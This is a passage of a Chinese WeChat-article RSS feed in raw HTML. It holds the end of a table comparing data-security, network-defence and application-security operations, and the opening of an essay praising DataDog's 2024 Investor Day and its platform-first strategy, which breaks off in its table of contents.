 1pt;"><tbody><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8548in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">维度</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">数据安全运营</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">网络攻防安全运营</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.7847in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">应用开发安全运营</span></span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8743in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">目标与侧重点</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">聚焦数据生命周期中的安全、合规与隐私保护，处理业务与法规相关问题</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">保障系统和网络架构的稳定性，抵御外部攻击和系统级威胁</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8048in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">确保开发阶段功能实现的安全性，减少上线后漏洞与风险</span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8743in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">复杂性来源</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">数据与业务逻辑的深度耦合，需要理解业务场景进行安全问题研判</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">外部攻击手段复杂多变，需快速检测并响应</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8048in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">开发流程复杂，对安全左移的需求导致流程前置化管理</span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8548in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;"><span style="font-weight:bold;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">依赖资源</span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf="">        </span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">跨部门协作（业务、IT、安全、法务）、法规知识、数据治理能力</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">技术工具（入侵检测、防火墙）、实时威胁情报和响应能力</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8777in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-size:12.0pt;color:black;"><span style="font-family:
  &#34;微软雅黑 Light&#34;;"><span leaf="">开发工具链（CI<span textstyle="" style="font-size: 16px;font-weight: normal;">/CD）、安全测试流程、代码审查机制。</span></span></span><span style="font-family:
  微软雅黑;"><span leaf=""><br/></span></span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8743in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">处理方式</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">基于规则和业务场景的研判分析，人工介入较多</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">自动化监测与快速对抗，实时响应威胁</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8048in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">在开发流程中嵌入安全措施，以预防为主</span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8743in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">关注对象</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">数据的生成、存储、处理、使用、传输和销毁全过程</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">网络攻击、系统漏洞、外部威胁</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8048in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">应用代码、功能逻辑、用户隐私数据</span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8743in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">实时性需求</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">中等：需要一定的时间分析数据与业务场景</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">高：强调快速检测与响应外部威胁</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8048in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">低：更强调开发阶段的前置性保障</span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8743in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">技术与业务融合</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">强：需要深刻理解业务逻辑与场景，确保数据安全措施贴合业务需求</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">中等：以技术工具为主导，业务逻辑融合较少</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8048in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">弱：主要关注技术流程的安全性，业务逻辑涉入较浅</span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:.8743in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">风险防控重点</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.9041in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">防范数据泄露、敏感信息滥用、违规使用</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.6506in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">防范外部攻击、APT、DDoS等高危事件</span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.8048in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">防范开发阶段代码漏洞、功能风险与用户隐私泄露</span></p></td></tr></tbody></table><section><span leaf=""><br/></span></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484416">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c0eb9901&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484416%26idx%3D1%26sn%3D17ddc3fe9db41f62d671067c5e474273%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 30 Dec 2024 23:04:00 +0800</pubDate>
    </item>
    <item>
      <title>为什么DataDog能吃几个、夹几个、看几个？</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484399&amp;idx=1&amp;sn=0b520ca7a7e4c096cc2a4c1355bedd1d</link>
      <description>DataDog手里都是王炸？是学、是跟、是抄、是躲、还是争？</description>
      <content:encoded><![CDATA[<p>
原创 <span>Alee</span> <span>2024-09-11 23:21</span> <span style="display: inline-block;">上海</span>
</p>

<p>DataDog手里都是王炸？是学、是跟、是抄、是躲、还是争？</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=6e571e40&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDSs2Dsfx4WaxibFPXic53Em1oun8t9Ie2UGYzotFiaEQGNnd90JkXeBx6A%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">群友<span lang="EN-US">Larry S</span>推荐<span lang="EN-US">DataDog Investor Day</span>投资者大会，说值得反复看几遍。我涉猎该领域，学习后深以为然，<span lang="EN-US">DataDog作为领先的可观测性和安全平台，</span>值得同仁借鉴，它有助于解除思维惯性的桎梏，提升技术创新的信心。</span></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">DataDog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">手里都是王炸？是学、是跟、是抄、是躲、还是争？若要深究的话，“生命以负熵为生”，<span lang="EN-US">DataDog</span>帮大家的工作降熵了，那它消耗了什么能量和资源？每年付费给<span lang="EN-US">DataDog</span>大几百万美元的狗大户，真的<span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 16px;letter-spacing: 0.578px;text-wrap: wrap;">甘之如饴、</span>两情相悦？</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;">国内Datadog 竞品如观测云，能出海虎口夺食，把客户转化到了他们系统中。</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;">谁都有机会，大家加油！</span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">感想</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">1</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">：宛如交响乐的投资者大会</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;"><span lang="EN-US">2024</span>年<span lang="EN-US">2</span>月DataDog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">的<span lang="EN-US"></span>投资者日宛如一场精心编排的交响乐。活动开场设定了</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:red;mso-font-kerning:0pt;">鲜明主题</span><span style="font-size:12.0pt;font-family:
&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:
0pt;">。核心信息——平台优先、数据核心、组织协同等——犹如反复出现的主旋律，在各位演讲者的阐述中不断重现，层层递进，余音绕梁。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">众多演讲者的<span lang="EN-US">&#34;</span>乐章<span lang="EN-US">&#34;</span>，都围绕这些主题展开，保持一致性的同时又各具特色，略添新意，让关键信息在听众心中久久回荡。演讲节奏适中，非常注意</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">衔接流畅</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">，让听众轻松接受。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">整体而言，<span lang="EN-US">Datadog</span>成功将复杂的商业战略转化为引人入胜的<span lang="EN-US">&#34;</span>听觉<span lang="EN-US">&#34;</span>盛宴，这场投资者日的妙手安排，有效传递并</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">植入了品牌理念</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">。</span><span lang="EN-US" style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">感想</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">2</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">：武学奇才不走寻常商业路</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">在科技江湖中，<span lang="EN-US">Datadog</span>宛如一位武学奇才。他不走教条路，甚至反叛经典，练成了神功，开宗立派。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">他傻憨憨地以</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:red;mso-font-kerning:0pt;">底层技术平台先行于应用和业务架构</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">，刚开张时差点无人投资饿死。但也因此练就了一身<span lang="EN-US">&#34;</span>统一实时数据平台<span lang="EN-US">&#34;</span>的深厚内功，再逐步开发各式各样的<span lang="EN-US">&#34;</span>功法<span lang="EN-US">&#34;</span>（产品）。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">他走的是群众路线，朴实到</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">解决问题先行于产品设计</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">。以解决一线用户问题为根本，深入体察<span lang="EN-US">&#34;</span>江湖儿女<span lang="EN-US">&#34;</span>（用户）的痛处，哪怕是最微弱的</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">&#34;</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:red;mso-font-kerning:0pt;">菜鸟<span lang="EN-US">&#34;</span></span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">之言，再锤炼出相应的<span lang="EN-US">&#34;</span>武功秘籍<span lang="EN-US">&#34;</span>（解决方案）。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">正是这种脚踏实地、虚心若愚的态度，让他们不断破级进阶，攻城略地，在纷繁复杂的科技江湖中独树一帜，财源广进，宗门兴旺。<span lang="EN-US"><o:p></o:p></span></span></p><table cellspacing="0" cellpadding="0"><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;"><td width="478" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><strong><span style="font-size:20.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">目录</span></strong><span lang="EN-US" style="font-size:20.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p></td></tr><tr style="mso-yfti-irow:1;mso-yfti-lastrow:yes;"><td width="463.3333333333333" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;word-break: break-all;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size: 18px;"><strong><span lang="EN-US" style="font-size: 18px;font-family: 微软雅黑, sans-serif;color: blue;">-主</span></strong></span><span style="font-size: 18px;"><strong><span lang="EN-US" style="font-size: 18px;font-family: 微软雅黑, sans-serif;color: blue;">题1：技术平台优先</span></strong></span><span lang="EN-US" style="font-size:
  11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">1.1 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">宏观叙事背景：技术变革与复杂性</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">技术创新</span></span><span lang="X-NONE" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;">→</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">复杂性的爆炸式增长</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">理解基础设施和应用程序的变化方式</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">1.2 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">统一实时数据平台奠<span lang="EN-US">定基业</span></span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">产品哲学是：平台先行，易用深涵</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">平台先于产品，艰难而正确的选择</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">从技术到业务的反向架构旅程</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
